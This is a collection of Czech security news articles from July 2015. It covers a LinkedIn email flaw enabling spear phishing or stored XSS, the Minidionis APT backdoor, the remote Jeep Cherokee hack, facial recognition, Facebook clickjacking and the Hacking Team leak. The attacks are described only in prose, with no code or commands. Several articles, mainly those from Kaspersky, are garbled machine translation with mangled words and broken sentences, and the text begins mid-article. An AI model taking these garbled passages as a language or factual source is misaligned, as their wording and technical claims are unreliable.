V opačném případě si vyžádají z řídícího serveru seznam linků na pornostránky a každých 60 sekund si náhodně vyberou jednu, k níž se připojí. Zobrazí ji však v neviditelném okně, takže uživatel nic netuší – nanejvýš by mohl zaregistrovat zpomalení odezvy přístroje nebo pomalejší internetové připojení.


Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing
25.7.2015 Sociální sítě

14. listopadu 2014 Bezpečnostní výzkumníci z Kaspersky Lab varoval, LinkedIn, největší světové obchodní orientované sociální síť, o bezpečnostní problém, který by mohl představovat velkou hrozbu pro své 360+ milionů uživatelů. Vzhledem k tomu, LinkedIn přitahuje tolik lidí v podnikatelské sféry, bezpečnostní chyba, jako je tento by mohly pomoci útočníkům účinně vykonat spear phishing kampaně, krást přihlašovací údaje a potenciálně získat vzdálenou kontrolu nad vybranými oběti, aniž by bylo nutné uchýlit se k sociálnímu inženýrství.

Linkedin zasnoubená s sanaci hrozbu a od té doby vydal opravu na zranitelné platformu.

"Zatímco určitý obsah HTML by měl být omezen a my jsme vydali opravy a poděkoval výzkumných pracovníků Kaspersky; pravděpodobnost využívat na populárních moderních e-mailových platforem je nepravděpodobné. " říká David Cintz , manažer Linkedin bezpečnostní ekosystému Senior Technical Program.

Vědci zjistili, zranitelnost po zjištění znak escape rozdíly při odesíláním komentářů z různých zařízení v různých funkcích. Druhá výstraha byla porucha v back-end parser platformy, že prostě interpretoval CRLF (stisknutí klávesy "Enter") na HTML značky <br /> , připojí ho k poště jako text. Dva nebyly vzájemně spojeny, ale oba zvednutý důležité otázky.

Ačkoli to může znít jako není tak velký problém, drobná závada takhle přitahuje pozornost útočníků. Při pohledu na ty dva chování, vědci byli přesvědčeni, že něco není v pořádku. Vypadá to, že nikdo nevšiml. Trvalo zkušené oko poskládat kousky skládačky.

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

ENTER úhoz vykládá na plain-text <br /> prvku

Podání více příspěvků z webového prohlížeče se úspěšně napodobil část chování rozdílů znak escape, ale tam byl žádné olovo na to, jak obejít anti-cross-site scripting (XSS), motor a generovat útok.

Další výzkum vedl k hlavní objevu. Tam byl důvod, proč je výstup z jednoho zařízení nebyl kódován stejná jako ta druhá.

Pošlete nám komentáře s HTML značek z webová platforma generované % 3C jako méně než charakter, zatímco stejný vstup z mobilního zařízení byl zakódován do & lt; . Další kontroly vedlo k přítomnosti dvou různých platforem. Ale to neznamená, že webová platforma byla zranitelná. Nebo to udělal?

Další zajímavý pohled bylo to, že každý komentář ke sloupku je odeslán prostřednictvím e-mailové platformy všem ostatním uživatelům, kteří byli součástí závitu. Rozdíly v těle tohoto e-mailu potvrdily naše podezření. Následující screenshoty ilustrují dva scénáře:

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Komentář zveřejněny na webových stránkách s řádným útěk

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Komentář vyslán z mobilní aplikace bez úniku

To ukázalo, že dvě různé e-mailové platformy existují a že mobilní oznámení by mohlo pomoci dodat škodlivý náklad bez jakýchkoli uživatelem dodaných vstupních validací.

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Podepsáno email odrazil od Linkedin bez ohledu na obsah

Sociální platformy jsou velký cíl pro hackery. Firmy jsou obecně hit bílými hat hackeři na denní bázi, se snaží dostat kus internetové bezpečnosti koláče. Ale co když černý klobouk hacker zjistí problém?

Při pohledu na následující graf, můžeme posoudit, jak tento typ bezpečnostního problému by mohla poskytnout útočníkovi velký kus řešení problému, jak distribuovat škodlivý software pod záminkou legitimní oznámení sociální platformy.

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Generic Malware Distribution Cycle

Malware autoři investovat hodně času při dosažení každého z těchto milníků. Každý krok má velký vliv na celkový výsledek: Pevné programování, které lze přizpůsobit mnoha systémů / zařízení, balírny a pojiv, mlžení a šifrování, kombinující průzkum se správnou distribuční metody a nalezení správného typu zero-day nebo zneužít vzdáleně ovládat systém.

Chcete-li ušetřit cenný čas, útočníci si chytré způsoby, jak přiblížit autory a koupit jejich potřeby pro každý milník, jako kdyby byly zboží v obchodě. Dokončení nákupní seznam uvařit tento typ útoku může stát hodně. Business-orientované sociální platforma, která obsahuje podrobné údaje o milionech obchodních mužů a žen, spolu s jejich tituly, kolegy, informace kariéry a více, by mohlo být velmi cenné. Není těžké se zaměřit na uživatele, a využívání těchto informací je jen jeden komentář pryč.

Vyberte si oběť

Injekční škodlivého komentář do Nové téma uživatele se automaticky spustí oznámení jeho e-mailový účet, bez ohledu na poskytovatele e-mailu nebo hierarchie spojení mezi obětí a útočníkem.

Ačkoliv se zdá, že aplikační server unikl nebezpečné znaky, užitečné zatížení je unikl jen z hlavní aplikace. E-mailové šablony je odeslána jako to je.

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Injekční nebezpečný náklad přes mobilní aplikace

V nejhorším případě, pokud poskytovatel e-mailu nefunguje správně uniknout obsah příchozích e-mailu, útočník může využít problém spustit škodlivý JavaScript vstřikování útoku, také známý jako uloženou XSS.

Jiný scénář může zahrnovat použití spojené formulář HTML shromažďovat informace o oběti nebo přesměrovat oběť na místo, kde může být škodlivý spustitelný stáhli.

Výzkumníci Kaspersky varuje před možným Linkedin oštěp phishing

Příklad situace - krást pověření

Poslední výzkumníci listopadu Kaspersky Lab kontaktovat bezpečnostní tým LinkedIn, a informovala je o této otázce. Platforma byla stanovena a hrozba byla zmírněna.

Jak zabránit sami od stávat obětí:

Použijte pokročilé řešení Internet Security k odfiltrování nebezpečných přesměrování na servery, které obsahují malware, phishing a další. Pokud je již nainstalován řešení, udržovat ji aktuální za všech okolností.
Otevření přílohu nebo na základě odkazu v e-mailu - dokonce i ze známé party - může obsahovat škodlivý obsah. Buďte velmi ostražití před rozhodnutím jej otevřete.
Nenechte se registrovat na sociální platformy s vaším firemním e-mailového účtu.
Bere na vědomí:

Jonathan Jaquez - CEO, Mageni.net


Minidionis - ještě jeden APT s využitím cloud pohonů
25.7.2015 APT

Včera naši kolegové z Palo Alto Networks představila svůj Minidionis výzkumu (známý také pod jménem Kaspersky - "CloudLook"). Je to další backdoor ze APT skupiny odpovědné za jiné útoky, například CozyDuke , MiniDuke a CosmicDuke .

Analýza tohoto malwaru, všimli jsme si, že útočníci implementován schopnost mraku disk pro ukládání malware a stahovat je na infikovaných systémů. Téměř před rokem, jsme pozorovali další APT skupinu s názvem " CloudAtlas "pomocí cloud disky pro ukládání ukradené informace. Teď vidíme podobnou techniku ​​v CloudLook / Minidionis.

Minidionis používá multidropper schéma infikovat své oběti. Za prvé, aby se na tento útočník používá kopí phishing e-maily s samorozbalovacího archivu přílohu předstírající, že hlasové pošty. Když se oběť otevře archiv, druhá etapa kapátko provede a soubor WAV hraje vypadá jako skutečné hlasové schránky. Ve svém spearphish, CloudLook také používal samorozbalovací archiv obsahující soubor PDF láká je to obětem informace o světového terorismu: 

Po úspěšném provedení, Minidionis druhý stupeň kapátko používá ke stažení užitečné zatížení onedrive oblak skladování:

Malware mapuje Onecloud úložnou jednotku jako síťový disk pomocí hardcoded přihlašovací jméno a heslo a potom dolů kopií svých cloudových uložené zadní vrátka do místního systému:

Mohl by tento přístup se více hlavního proudu? Je docela dobře možné, protože to ve skutečnosti dává útočníkům jednoduchou metodu skrývá škodlivé chování. Zjištění nebezpečného provozu s legitimním cloudových služeb je složitější, protože to znamená, že blokuje legitimní služby.

Podle Kaspersky Security Network, každý útok pomocí Minidionis / CloudLook backdoor byl speciálně vytvořený pro konkrétní cíl. Tato specifičnost demonstruje, že útoky jsou velmi uživatelsky a zaměřil se na cenné cíle. Doposud jsme pozorovat několik cílů, nejvíce pozoruhodně evropských diplomatické organizací.

Kaspersky Lab detekuje všechny známé vzorky Minidionis / CloudLook jako Trojan.Win32.Generic, a úspěšně chrání své uživatele před hrozbou.


Zero Day využije: nyní k dispozici pro auta
25.7.2015 Zranitelnosti

Den před Včera byl důležitý den pro informační bezpečnosti průmyslu. Vyšetřovatelé oznámili využívání vůbec prvního 0-denní zranitelnost pro automobily. Bezdrátový Útok byl demonstrován na Jeep Cherokee.

Charlie Miller a Chris Valášek našel zranitelnost v palubním počítačem vozu. Lidé mluvili na dlouhou dobu o útocích na těchto systémů v případě, že útočníci mají přístup k diagnostickým konektorem. Nicméně vzdálený útok na kritických systémů autě zůstala čistě teoretický scénář, o kterém odborníci varují na dlouhou dobu (včetně odborníků ze společnosti Kaspersky Lab). Mnozí doufali, že výrobci automobilů by rozpoznal nebezpečí takových zranitelností zneužívána a přijímat preventivní opatření. No, přecenil jsme je.

Vyšetřovatelé získali přístup prostřednictvím palubního zábavního systému nejen nekritických nastavení, ale také ovládací prvky vozu, jako jsou brzdy a akcelerátoru. Vyšetřovatelé plánujete publikovat technické podrobnosti hack v srpnu, ale celkovém schématu věcí je již známo.

Car Hack

Chcete-li začít s, klimatizační, rozhlasové a stěrače zbláznil a řidič nemohl dělat nic o tom. A pak auto sám. Urychlovač a brzdy džípu reagovala pouze na odlehlých vyšetřovateli, a nikoli na majiteli vozu za volantem.

Je zde třeba poznamenat, že auto se nebyla změněna . Všechny výše uvedené se provádí za použití zabezpečení v palubním Uconnect systému, který se stará o kontakt s vnějším světem přes infrastruktury provozovatele Sprint buněk v automobilech na FCA auto-skupiny (Chrysler, Dodge, Fiat, džípu a RAM). Je to dost znát externí IP adresu oběti (o něco později více o těchto jednotkách) přepsat kód v hlavní jednotky vozu.

Firma již vydala opravu pro Uconnect, který může být nainstalován buď na oficiálních dealerů, nebo, v případě technicky zlobil, nezávisle pomocí USB portu. V okamžiku, kdy vyšetřovatelé mohou vidět VIN, GPS souřadnic určitého vozidla a IP adresu, připojením k síti Sprint a za použití 0-day exploit našli. Mimochodem, najít konkrétní vozidlo mezi 471.000 vozidel s Uconnect na palubě je podle vyšetřovatelů, značně obtížné.

Koncepční obrana

Toto není první událost ukazuje na nedostatečné bezpečnostní mechanismy zabudované do moderních automobilů jako standard. Před tímto jsme viděli místní zabavení nad řízením přes diagnostické portu OBD-II a nedovoleného aktualizaci softwaru přes falešnou buňka základnové stanice.

Oba výrobci operační systém a výrobci automobilů jsou nyní provádění důležité a potřebné , ale nedostatečné, kybernetické bezpečnostní opatření. Situaci ještě zhoršuje skutečnost, že architektura palubních elektronických sítí vozidel byl vyvinut v 80. letech, kdy se myšlenka, že auto by být připojen k Internetu bylo něco z sci-fi. A v důsledku toho, ačkoli elektronické součástky jsou spolehlivé a funkčně bezpečný totéž nelze říci o jejich počítačové bezpečnosti. Tady ve společnosti Kaspersky Lab, stejně jako v případě s běžnými počítačovými sítěmi, jsme přesvědčeni, že naprostá bezpečnost multi-level může být dosaženo pouze kombinací pravého architektury, vyvinula s přihlédnutím ke všem rizikům, včetně kybernetických rizik, správné nastavení z předem stanovených zařízení a použití specializovaných řešení.

Architektura

Přístup Kaspersky Lab je založen na dvou základních architektonických principů: izolaci a řízených komunikací .

Izolace zaručuje, že dva samostatné subjekty, nelze v žádném případě vzájemně ovlivňují. Například, zábavní aplikace nemohou mít vliv na technické sítě. Ne na palubě letadla, a ne v autě.

Řízení komunikace zaručuje, že dva nezávislé subjekty, které by měly společně pracovat pro systém fungovat tak učiní přísně v souladu s politikou bezpečnosti a zabezpečení. Například systém pro získávání telemetrii a jeho odeslání do servisního střediska mohou pouze číst data o stavu vozu, ale nepřenáší řídicí signály. Tento druh kontroly by byla velkým přínosem pro naše majitele Jeep.

Využití kryptografie a ověřování pro přenos a přijímání informací uvnitř a zvenčí je rovněž nezbytná součástí chráněného systému. Ale soudě podle výsledků vyšetřovatelů, Jeep použit buď slabé zranitelné algoritmů nebo kryptografie byl realizován s chybami, nebo nejsou implementovány vůbec.

Popsaný přístup - izolace a kontrola komunikace - se přirozeně na operační systém mikro-kernel s řízenou interakci mezi procesy. Každý logický doména má svůj vlastní adresový prostor a všechny kontakt mezi doménami se vždy provádí prostřednictvím bezpečnostní monitor.

Produkty

Z palubní elektroniky ovládajících kriticky důležité funkce vozidla a teoreticky otevřený k útoku klíčové prvky jsou hlavové jednotky (HU) a elektronické řídicí jednotky (ECU), které tvoří celou síť regulátorů. K dispozici jsou řídicí bloky pro motor, převodovka, odpružení atd.

Jednotky hlavy pracují na reálných time operační systémy (RTOS), jako QNX, VxWorks a další. Společnost Kaspersky Lab má v úmyslu nabídnout své vlastní chráněné operační systém pro hlavy jednotky po získání potřebných certifikátů.

Oba architektonických principů výše (izolace a kontrola komunikacích) zmíněných jsou základními principy KasperskyOS - bezpečná mikro-kernel operační systém s řízenou interakci mezi procesy.

Operační systém byl vytvořen od nuly a bezpečnost byl jeho hlavní prioritou od samého počátku. To je hlavní rozdíl mezi naším výrobkem a operačních systémů nyní instalovány do vozů. Zavolali jsme klíčovou součástí našeho bezpečného operačního systému Bezpečnostní systém Kaspersky (KSS)

Během provozu tento systém má povinnost provádět výpočet verdikt o bezpečnosti daném případě děje v systému. Na základě tohoto rozsudku jádro operačního systému přijme rozhodnutí povolit nebo zablokovat události nebo pro komunikaci mezi procesy. S pomocí KSS je možno ovládat žádnou činnost, - přístup do přístavů, souborům, síťových zdrojů prostřednictvím konkrétních aplikací atd v okamžiku, kdy KSS pracuje na pikeos a Linux.

Software na elektronických řídicích bloků je pouze malé bloky kódu, a pro tyto společnosti Kaspersky Lab má v úmyslu spolupracovat s firmami mikroelektroniky společně zaručit bezpečnost tohoto embedded software.

V místě závěru

My opravdu nechci, aby sami sebe popřít pohodlí, které elektronizace automobilů přineslo. Pokud však výrobci automobilů nezačnou brát problém kybernetické bezpečnosti svých vozů připojených k Internetu vážně a nezačnou náročný, že výrobci automobilových součástí, to samé pak lidé, kteří se obávají o bezpečnost budou muset přejít na klasické automobily , Ano, stará auta nemají počítače. Ano, nemají počítačem řízené vstřikování paliva, navigační systémy, ovládání klimatizace a další moderní pomůcky. Ale na druhou stranu oni jen poslouchali osobu za volantem.


Rozpoznávání obličeje v praxi (1)

25.7.2015 Biometrika
Potenciál technologie rozpoznávání obličeje je významný, i když se ho ještě nepodařilo plně zužitkovat.

Tak by přece měla vypadat budoucnost. Zástupci dobra musí dokázat najít lumpa i v davu lidí, takže začali skenovat prostředí kamerou, která obsahuje technologii rozpoznávání obličeje.

O pár vteřin později se kamerou zachytí obličej, který vykazuje pozitivní shodu s položkou v jejich trestní databázi, a ejhle – mají ho. Tato budoucnost je už v určité podobě součástí dnešních dnů.

Úroveň přesnosti této platformy není dostatečně vysoká, aby ji šlo použít ve výše uvedeném případě, alespoň ne s vysokou mírou úspěšnosti.

Je však dostatečně dobrá pro implementaci v řadě různých vertikálních trhů včetně komerčního sektoru, marketingu, zdravotnictví a pohostinství.

„V mnoha případech je rozpoznávání obličeje dobrým pomocným nástrojem umístěným nad současnými systémy,“ uvádí Bob Lorenz, výkonný specialista na oblast videa ve společnosti Panasonic.

„Například v oblasti maloobchodu již prodejny používají bezpečnostní kamery, aby odhalily krádeže, ale zároveň už nyní rozpoznávají obličeje,“ tvrdí Lorenz.„Když někoho chytí, uloží se tyto obličeje do databáze a v případě příštího rozpoznání dostane personál obchodu či ochranka upozornění. Je to dílčí komponenta přidaná k již nasazené infrastruktuře.“

Jay Hauhn, technologický ředitel a viceprezident společnosti Tyco Integrated Security, dělí použití rozpoznávání obličeje do dvou kategorií: spolupracující a nespolupracující prostředí.

V prvním případě si osoba, jejíž obličej se bude skenovat, uvědomuje skenování a vybrala si tento proces jako nástroj ověření své identity – tyto osoby se budou dívat přímo na kameru a nebudou se snažit jakkoli zakrývat svůj obličej.

Nespolupracující prostředí jsou taková, kde si subjekt nemusí uvědomovat skenování svého obličeje a nepokouší se hledět přímo na kameru.

„Ve spolupracujícím prostředí to funguje velmi dobře,“ prohlašuje Hauhn. „Je to stejné jako jakékoliv jiné biometrické řešení, ale to není příslib rozpoznávání obličejů. V tomto scénáři není těžké rozpoznávání obličeje obejít pomocí obrazu.“

Ačkoli Hauhn tvrdí, že ve spolupracujícím prostředí založeném na zabezpečení, kde se používá rozpoznávání obličejů v nejjednodušší podobě, není tuto technologii tak těžké ošálit, je tu ještě naděje.

Ačkoli nemohl prozradit podrobnosti, Hauhn uvádí, že společnost Tyco zná firmu, která vyvíjí další faktory implementovatelné do rozpoznávání obličeje za účelem vytvoření vícefaktorové autentizace ve spolupracujícím prostředí.

Například namísto pouhého rozpoznávání obličejů by kamery brzy sledovaly i mrkání, pohyb rtů, pohyby obličejových svalů, duhovky a možná i chůzi člověka.

V nespolupracujícím prostředí není rozpoznávání obličejů tak široce implementované, alespoň ne úspěšně, a to v důsledku relativně nízké efektivity, vysvětluje Hauhn. Příslib rozpoznávání obličejů se podle něj spíše týká nalezení někoho v davu. V této oblasti je ale efektivita nižší.

Hauhn uvádí příklad kasin, která se snaží používat rozpoznávání obličejů, aby udržela podvodníky mimo své prostory. I když připouští, že nezná dobře bezpečnostní metody kasin, uvádí, že pravděpodobně mohou použít potřebné zdroje k prosívání četných falešně pozitivních výsledků a zblízka osoby identifikovat.

Svatým grálem by bylo, kdyby mohly bezpečnostní týmy ze svého stanoviště použít libovolný záběr kamerou z jakéhokoliv úhlu k identifikaci případných zločinců.

„Tak daleko ale zatím nejsme,“ prohlašuje Hauhn. „Tato technologie ještě není tak dobrá. Je velmi snadné použít klobouk a nedívat se do kamery ze vhodného úhlu, aby nemohla získat správná data. Dvourozměrné systémy vyžadují k dosažení přesnosti přímý pohled.“

Existují však firmy, které pracují na rozpoznávání obličejů ve 3D prostředí. S využitím geografických kamer, jež užívají více značek, lze zvýšit pravděpodobnost získání dobrého snímku, přestože se osoba nedívá přímo do kamery.

Stále daleko

Platforma rozpoznávání obličeje je však stále ještě velmi nevyzrálá. Lorenz uvádí, že technologie kamer se na úroveň dostatečnou k úspěšnému rozpoznávání obličejů dostala až v posledních třech až čtyřech letech.

„Při rozpoznávání obličejů často narazíte na úskalí spojené s dostatečně dobrým zobrazením tváře,“ zmiňuje Lorenz. „S novými HD kamerami, větším počtem megapixelů a kvantem dat, které je možné přenášet do backendových systémů, jsme se skutečně dostali do bodu zvratu. Nyní můžete získat jasnější obraz, lépe vykreslené obličeje a detekce se v těchto situacích zlepšuje.“

Zatímco Hauhn souhlasí s názorem, že lepší technologie přinesla lepší přesnost, nevěří, že se rozpoznávání obličeje již ukázalo jako dostatečně funkční v tzv. nespolupracujícím prostředí.

Pokud osoby nevědí, že jsou podrobené úkonu rozpoznávání obličeje, je to skutečně nespolupracující prostředí a bohužel – to je v mnoha případech podstata použití pro bezpečnostní účely, jako je například skenování na letištích s cílem identifikovat osoby související s terorismem.

„Po 11. září se očekávalo, že video a rozpoznávání obličejů vyřeší všechny naše problémy. To se však nestalo,“ tvrdí Hauhn. „Přibližně před sedmi až osmi lety došlo k důležitým testům, které ukázaly, že se přesnost nezlepšila.“

Ve spolupracujících prostředích, jako je například evidence osoby na policejní stanici, však rozpoznávání obličeje funguje velmi dobře, uvádí Hauhn.

„Možnost najít něčí tvář v celé databázi osob funguje velmi dobře,“ popisuje. „Pokud pracujete s otisky prstů, není to v tomto prostředí zdaleka tak rychlé. Ale opět je to vynucená spolupráce.“

Hauhn stejně jako Lorenz připomíná, že rozpoznávání obličejů by mohlo dobře fungovat i v nespolupracujících prostředích. Cíl je ale stále daleko.

„Když se podíváte na to, kde je rozpoznávání obličeje na stupnici přesnosti biometrických metod, je to jedna z méně přesných ve srovnání, řekněme, s biometrickými údaji o otiscích prstů,“ upozorňuje Lorenz.

„Rozpoznávání obličejů je v tomto ohledu méně přesné. Existují další závislosti, jako je schopnost dobrého zachycení obličeje za slabého osvětlení a obličeje, který zabírá kamera pod úhlem.“

Lorenz dodává, že účinnost závisí také na technologiích skrytých za systémy, jako je typ algoritmu vyhledávajícího shody, používaný v oblasti back-endu. Stejně jako Hauhn považuje také Lorenz typické dvourozměrné rozpoznávání obličejů za limitované a snadno oklamatelné a trojrozměrné systémy jsou podle něj přitažlivější z hlediska přesnosti a překonání omezení, jako je například úhel pohledu.

Je tu mnoho prostoru pro rozvoj. Jak poroste vyspělost a přesnost rozpoznávání obličejů, můžeme očekávat nárůst použití ve více scénářích a pro různé účely.

„Myslím si, že ve spolupracujícím prostředí existuje obrovské množství prostoru pro růst,“ prohlašuje Hauhn. „Například přístupové systémy: můžete přijít ke dveřím a systém vás rozpozná a otevře vám a dokonce může upozornit, zda za vámi neproklouzla další osoba. Nebo bankovní transakce. Myslím si, že by lidé rádi použili svůj obličej ke garanci přístupu ke svým penězům a tomu, že se k nim nedostane nikdo jiný.“

Lorenz má podobný názor a tvrdí, že s rozvojem technologie se budou kamery již nasazené ve velkých městech postupně modernizovat a bude se více používat rozpoznávání obličejů. Hauhn souhlasí a dodává, že současný relativní nedostatek nasazení je také otázkou nákladů.


Hackeři u Jeepu Cherokee na dálku otáčeli volantem a vyřadili brzdy

23.7.2015 Hacking
Stále více automobilů umožňuje posádce připojit se k internetu. A to může být u špatně zabezpečeného auta obrovský problém. Redaktor magazínu Wired společně se dvěma hackery ukázal, jak lze auto na dálku zcela ovládat.
Jeep Grand Cherokee
Experti Charlie Miller a Chris Valasek rok zkoumali, zda systém Uconnect, který používají automobily Fiat Chrysler, obsahuje bezpečnostní chyby. Chvíli to trvalo, ale nakonec se jim podařilo dostat se na dálku nejenom do multimediálního systému, což by ještě bylo úsměvné, ale také ke všem řídicím jednotkám. A mohli tak zcela ovládat všechny funkce auta.

Přesvědčil se o tom redaktor amerického časopisu Wired. Nejdříve mu oba experti jenom vypnuli klimatizaci nebo zvýšili hlasitost rádia, pozdější zásahy už ale mohly ohrozit bezpečnost řidiče a dalších lidí v okolí.

Nebyl totiž problém autu na dálku snížit výkon, vypnout a znovu nastartovat motor, točit volantem nebo vyřadit z provozu brzdy. A to je ohromný problém. A přitom hackerům stačilo zjistit IP adresu, skrz kterou bylo napadnuté auto připojeno k internetu.

Miller i Valasek hodlají nechtěné dálkové ovládání auta popsat v srpnu na konferenci Black Hat v Las Vegas. Nutno říci, že oba experti se zachovali velice zodpovědně. Na samotný problém upozornili koncern FCA měsíce dopředu, takže automobilka mohla vydat „bezpečnostní záplatu”. I tak je to ale velmi znepokojivé.


Lajkujete, doporučujete… a nevíte o tom

21.7.2015 Sociální sítě
.Analytici společnosti Eset odhalili další trik, kterým si podvodníci na Facebooku dopomáhají k popularitě svých příspěvků. Cílí především na. uživatele Facebooku v Česku, na Slovensku a v Polsku.

Principem podvodu je, že oběti podsouvá ke stisknutí tlačítka „Doporučit/To se mi líbí“ a „Odeslat“. Tato tlačítka jsou totiž na podvodné stránce průhledná.

Návštěvník se snaží zavřít otravnou reklamu, ale místo toho nevědomky přidá na časovou osu (Timeline) ve svém profilu příspěvek, který tam mít nechtěl. Podvodníci takto dokázali za pár dnů získat stovky tisíc sdílejících uživatelů Facebooku.

Podvod začíná linkem na zajímavé video. Typicky jde o spoře oděné dívky (například nejúspěšnější podvod tohoto typu na Slovensku zobrazoval dámské pozadí v elegantních kalhotkách a titulek „Kašlete na předsudky!“) nebo o jiný obsah lákavý pro velké množství uživatelů. Po kliknutí na příspěvek se sice otevře záložka s očekávaným videem, to je však překryté reklamou.

V momentě, kdy uživatel přejede kurzorem myši nad křížek, který by měl reklamu zavřít, se zobrazí bublinová nápověda s textem: “Препоручено”, což je v překladu ze Srbštiny “Doporučit”. To by pozorným uživatelům napovědělo, že kurzor jejich myši se nachází facebookovým tlačítkem “Doporučit”/”To se mi líbí“. Tlačítko je však průhledné, tedy neviditelné. Běžný uživatel si však ničeho nevšimne a na tlačítko nevědomky klikne.

Podvodníci se dokázali vypořádat i s tím, že Facebook po kliknutí na „Líbí“ vyžaduje ještě komentář a kliknutí na tlačítko „Odeslat“. Nastavili parametry okna tak, že se tlačítko „Odeslat“ – opět průhledné, tedy neviditelné – nachází v místě, kam uživatel kliknul ve snaze zavřít reklamu. Spoléhají na netrpělivost: zájemce o pikantní video nejspíš klikne na „zavírací křížek“ znova. Tím se mu však kýžené video dostane na časovou osu v jeho profilu.

„Obdobné zvyšovače popularity nejsou na Facebooku novinkou, ale tato specifická varianta se objevila teprve nedávno. Vzniklo několik slovenských, českých a hlavně polských falešných profilů, odkud se tato atraktivní podvodná videa šíří po Facebooku. Cílem těchto aktivit je popularizace stránek, zobrazování placené reklamy na cílových internetových stránkách, případně reklama přímo v příspěvcích,“ vysvětluje analytik společnosti Esetu Ľubomír Trebula, který se podílel na rozkrytí těchto praktik.

Produkty Esetu detekují popsané podvody jako HTML/TrojanClicker.IFrame.NBA, případně HTML/Iframe.B.Gen.

Pro uživatele Facebooku, kteří se chtějí podobným hrozbám do budoucna vyhnout, připravil Eset sadu doporučení:

K zavření reklamy na neznámých stránkách použijte raději klávesu “ESC”, nebo vyčkejte, až reklama zmizí sama.
V případě podezřelého chování stránky raději danou záložku co nejrychleji zavřete, nejlépe klávesovou zkratkou CTRL+F4.
V případě jakýchkoli pochybností zkontrolujte svůj facebookový profil a případné nechtěné příspěvky ručně vymažte.


Rychlé zprávy

20.7.2015 Blog

Společnost Oracle vydala záplatu pro kritickou zranitelnost Javy, která byla naneštěstí objevena proto, že již byla aktivně využívána k útokům. Během vyšetřování operace nazvané Pawn Storm narazila společnost Trend Micro na podezřelé e-maily obsahující odkazy na stránky, na kterých byla tato dosud neznámá zranitelnost aktivně exploitována. Cílem útoku byly armádní síly členských zemí NATO a obranné složky USA. Zranitelnost se týká pouze poslední Javy verze 1.8.0.45.

Když si uvědomím, jaké množství uživatelů má stále zapnutou Wi-Fi a kolik z nich neukončuje aplikace v mobilním telefonu, ale nechává je běžet na pozadí, tak tohle bude další potenciálně zajímavá bezpečnostní díra. Wi-Fi Aware je technologie, která bude umožňovat aplikacím, které to budou podporovat, automaticky si vyměňovat data. Například pokud budou mít dva cizí lidé na svém telefonu stejnou hru, pak by aplikace měla být schopna zjistit, že se ocitli vzájemně v dosahu a umožnit jim si zahrát společně. Nebo třeba zařízení, které bude poblíž obrazu v muzeu, automaticky pošle informace o obraze návštěvníkovi, procházejícímu kolem.

Tři britští politici byli hacknuti skupinou odborníků během používání nezabezpečených Wi-Fi sítí. Nejsem si zcela jist, co to mělo dotyčným politikům demonstrovat, zvláště proto, že o tom, že se někdo pokusí napadnout jejich účty, dopředu věděli. Politici se samozřejmě nechovají jinak než běžní uživatelé, takže kromě toho, že používali veřejné Wi-Fi sítě bez jakékoliv další ochrany, tak minimálně jeden z nich také používal stejné jméno a heslo pro e-mail a PayPal. Ostatně o problematice nakládání s hesly na straně uživatelů se tento týden také hovořilo.

Do diskuze o vynuceném přístupu vlád do šifrované komunikace uživatelů se vložila další těžká váha – Massachusetts Institute of Technology. Laboratoř Computer Science a Artificial Intelligence této university nyní vydala report, ve kterém upozorňuje, že aktuální snahy vlád získat přístup k uživatelským datům kvůli zvýšení bezpečnosti na Internetu jsou v praxi neproveditelné. Dále přináší obrovské právní a etické otázky, které by mohly zvrátit již dosažený progres v bezpečnosti a způsobit tak velké ekonomické škody.

Už jste se někdy setkali s mobilní aplikací, která by stále pracovala na pozadí, i když jste ji kompletně odinstalovali? Tak takto nějak se má chovat aplikace Google Photos. Problém je, že i po jejím odstranění se o synchronizaci dál starají jiné části systému Android, a to do té doby, než uživatel zruší možnost synchronizovat fotky v nastaveních. Sám jsem to netestoval, ale pokud došlo k zapnutí synchronizace v souvislosti s instalací aplikace Google Photos, bylo by dle mého názoru správné vypnout synchronizaci s odinstalací aplikace, nebo uživatele aspoň upozornit, že odinstalací aplikace se samotná synchronizace neruší.


Rozbor malware od Hacking Teamu: jak se používá?

20.7.2015 Analýzy

Data ukradená společnosti Hacking Team a zveřejněná na internetu poskytují jistý náhled na to, jak vypadá „komerční hackování“ zabalené v pozlátku hezkého rozhraní pro uživatele/zákazníky. Služeb Hacking Teamu využívala i česká policie. Pojďme se podívat, co o tomto zajímavém případu soubory říkají.

Jak vlastně k úniku došlo

K akci se přihlásil uživatel Phineas Fisher, který loni zveřejnil o něco méně dokumentů z firmy Gamma Group zabývající se stejným byznysem jako Hacking Team. Loni též vydal zprávu popisující, jak se k tomu dostal. Ve zkratce: vyhackoval hůře zabezpečené servery využívající zakázkový software od stejné firmy jako používala Gamma, nalezl v něm triviální bezpečnostní díry jako SQL injection, a ty potom použil proti Gammě.

O tomto hacku slíbil, že časem také napíše. Zatím byl zveřejněn screenshot kompromitované stanice s Windows s komentářem naznačujícím, že přes ni data tahal. Na druhou stranu v uniklých datech je i seznam opravdu směšných hesel, takže to asi není žádné překvapení…

Zpracování dat

Zveřejněný torrent obsahuje 400 GB různých souborů. Z těch zajímavějších jsou to maily, databáze, domovské adresáře uživatelů, dokumentace a zdrojové kódy utilit vyvíjených Hacking Teamem. Z těch méně zajímavých pak software od linuxových distribucí po cracknuté vývojářské nástroje.

Z torrentu jsem vyčistil zjevné zbytečnosti (jako ta instalační média Windows atd.), rozbalil všechny archivy a z outlookových profilů extrahoval všechny maily do čitelného formátu utilitou readpst. Ještě by asi bylo užitečné vyklonovat všechny git repozitáře, ale to už někdo udělal. Potom jsem na to spustil Recoll. Díky tomu v obsahu archivu můžu rychle vyhledávat fulltextově.

Ještě než mi doběhla indexace, objevily se zaindexované maily na WikiLeaks. Jsou to jenom maily, na druhou stranu mají čitelné přílohy – mně readpst některé přílohy podivně poškodilo.

Dále se v torrentu nacházel linuxový server zazálohovaný stylem tar c /. Běžela na něm tiketovací aplikace, kterou zákazníci Hacking Teamu používali k řešení technických problémů s podporou, a, jak popíšu dále, i k samotnému získávání exploitů.

Z aplikace nás zajímá asi hlavně databáze. Kupodivu stačilo zkopírovat adresář /var/lib/mysql a spustit mysql. Dělejte to ale radši v nějakém dobře izolovaném virtuálu, kdo ví, jestli mysql nejde takto exploitnout – nebo třeba udělat shell trigger, který vám něco nepěkného provede.

